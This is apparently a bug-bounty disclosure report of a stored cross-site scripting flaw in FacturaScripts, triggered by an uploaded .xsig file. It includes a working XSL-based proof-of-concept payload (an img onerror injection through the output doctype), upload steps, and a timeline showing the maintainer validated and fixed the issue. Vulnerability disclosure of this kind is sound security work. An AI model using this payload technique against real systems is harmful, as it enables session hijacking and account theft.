xss using .xsig file in neorazorx/facturascripts

Valid

Reported on

May 14th 2022


Description

xss using .xsig file

Proof of Concept

1. Save this file as test.xsig file and upload it to http://localhost/ListAttachedFile

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>]>
<!-- It works on Chrome/Safari/Edge and IE -->
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" doctype-system="&gt;&lt;img src=x onerror=alert(1)&gt;"  />
<xsl:template match="/">
<root/>
</xsl:template>
</xsl:stylesheet>

2. now view this file in chrome browser and see xss is executed

Impact

xss allow to steal victim account cookie

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on f1ca50 a month ago
Carlos Garcia has been awarded the fix bounty
AppRouter.php#L51-L295 has been validated
to join this conversation